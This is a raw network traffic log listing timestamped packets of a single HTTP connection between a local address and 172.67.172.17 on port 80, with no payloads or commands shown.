Feb 23, 2021 15:30:33.530749083 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530766964 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.530772924 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530798912 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530816078 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.530817032 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.530854940 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.535854101 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.535892963 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.535917997 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.535938025 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.535939932 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.535964012 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.535986900 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.535988092 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536010981 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536029100 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536031008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536052942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536073923 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536073923 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536094904 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536117077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536140919 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536140919 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536165953 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536166906 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536190987 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536210060 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536214113 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536253929 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536279917 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536304951 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536330938 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536349058 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536350012 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536380053 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536391020 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536535025 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536560059 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536581993 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536590099 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536607981 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536619902 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536632061 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536653996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536669016 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536678076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536700964 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536715984 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536722898 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536746979 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536761999 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536770105 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536797047 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536809921 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536822081 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536844969 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536860943 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.536869049 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536894083 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.536909103 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.537501097 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537529945 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537554026 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537564993 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.537580013 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537600994 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537620068 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537638903 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537657022 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.537667036 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537691116 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537694931 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.537714005 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537740946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537749052 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.537765026 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537786961 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.537790060 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537813902 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537828922 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.537863016 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537889004 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.537914991 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.538496017 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538527012 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538553953 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538563013 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.538599968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538604975 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.538625002 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538652897 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538675070 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.538686991 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538712978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538737059 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.538738966 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538764000 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538781881 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.538789034 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538815975 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538830042 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.538841963 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538866043 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538881063 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.538891077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538914919 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.538928032 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.539396048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.539422989 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.539434910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.539535046 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.550374031 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.550410032 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.550435066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.550456047 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.550476074 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.550488949 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.550498009 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.550514936 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.550527096 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.550548077 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.604676008 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.616102934 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616134882 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616153002 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616168976 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616189003 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616208076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616225004 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616240978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616255999 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616297007 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.616329908 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.616702080 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616724014 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616740942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616755009 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616794109 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616811991 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616827965 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616844893 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616858006 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616871119 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616889000 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616894960 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.616904974 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616920948 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616935968 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.616936922 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616957903 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.616965055 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.616976023 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617108107 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617188931 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617206097 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617244959 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617254019 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617271900 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617290974 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617300034 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617304087 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617321968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617330074 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617343903 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617362022 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617367029 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617418051 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617701054 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617738008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617754936 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617772102 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617784977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617793083 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617803097 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617813110 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617820978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617837906 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617851973 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617856026 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617870092 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617887020 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617893934 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617902994 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617918015 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.617921114 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617934942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617947102 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.617959976 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618017912 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.618680954 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618704081 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618716955 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618745089 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618756056 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.618757963 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618771076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618788004 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618793964 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.618805885 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618820906 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618823051 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.618841887 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618848085 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.618860006 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618875980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618889093 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618896008 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.618906975 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618918896 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.618927002 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618944883 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.618951082 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.618993044 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.619637012 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619659901 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619678020 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619694948 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619710922 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619718075 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.619728088 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619748116 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619755030 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.619766951 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619782925 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619798899 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619801998 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.619815111 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619831085 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619832993 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.619846106 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619862080 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619868994 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.619880915 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619893074 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.619899988 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.619920015 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.619950056 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.620580912 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620608091 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620626926 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620644093 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620661020 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620676994 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620685101 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.620693922 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620712042 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620727062 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620728970 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.620749950 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620767117 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.620769978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620788097 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620794058 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.620805025 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620822906 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620830059 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.620840073 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620857000 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.620866060 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.620893002 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.621546030 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621570110 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621586084 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621606112 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621623993 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621642113 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621659040 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621675968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621689081 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621706009 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621718884 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.621722937 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621741056 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621757984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621773958 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.621773958 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621792078 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621800900 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.621812105 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.621829987 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.621901989 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.622498989 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622523069 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622539997 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622558117 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622574091 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622589111 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.622592926 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622612953 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622622013 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.622629881 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622648001 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622665882 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622678041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622687101 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.622694016 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622710943 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622716904 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.622726917 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622740984 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.622744083 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622760057 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.622772932 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.622805119 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.623440981 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623466015 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623486042 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623505116 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623521090 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623533010 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.623538017 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623553991 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623563051 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.623570919 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623586893 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623600006 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.623604059 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623624086 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623641968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623655081 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.623657942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623673916 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623691082 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623697996 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.623708010 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.623784065 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.624419928 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624444008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624459982 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624476910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624496937 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624515057 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624519110 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.624531984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624547958 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624556065 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.624564886 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.624581099 CET	80	49737	172.67.172.17	192.168.2.4
